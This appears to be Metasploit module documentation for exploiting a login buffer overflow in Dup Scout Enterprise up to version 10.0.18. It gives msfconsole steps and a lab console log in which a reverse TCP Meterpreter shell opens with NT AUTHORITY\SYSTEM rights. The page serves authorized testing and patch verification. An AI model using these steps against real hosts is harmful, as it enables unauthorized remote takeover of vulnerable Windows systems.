## Vulnerable Application

This module exploits a stack buffer overflow in Dup Scout Enterprise
versions <= 10.0.18. The buffer overflow exists via the web interface
during login. This gives NT AUTHORITY\SYSTEM access.

This module has been tested successfully on Dup Scout Enterprise
versions:

* 9.9.14 on Windows 7 SP1 (x64)
* 9.9.14 on Windows XP SP0 (x64)
* 10.0.18 on Windows 7 SP1 (x64)
* 10.0.18 on Windows XP SP0 (x86)
* 10.0.18 on Windows 10 (1909) (x64)

## Verification Steps

Download:

* [Dup Scout Enterprise v9.9.14](https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe)
* [Dup Scout Enterprise v10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)

Install the application from the link above and enable the web server by going to
Tools -> Advanced Options -> Server -> Enable Web Server on Port.

Metasploit:

1. Install the application and set the option above to enable the web server
1. Start msfconsole
1. Do: `use exploit/windows/http/dup_scout_enterprise_login_bof`
1. Do: `set rhosts <rhosts>`
1. Do: `run`
1. You should get a shell.

## Options

## Scenarios

### Dup Scout Enterprise version 10.0.18 (x86) on Windows 10 (1909) (x64)

```
msf6 > use exploit/windows/http/dup_scout_enterprise_login_bof 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set rhosts 172.16.191.199
rhosts => 172.16.191.199
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 172.16.191.192 
lhost => 172.16.191.192
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Dup Scout Enterprise version 10.0.18.
[*] Selecting a target...
[*] Using target: Dup Scout Enterprise 10.0.18 (x86)
[*] Generating payload ...
[*] Sending payload (10000 bytes) ...
[*] Sending stage (175174 bytes) to 172.16.191.199
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:50196) at 2021-02-22 21:14:52 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-6VPIDIM
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 17
Meterpreter     : x86/windows
meterpreter >
```

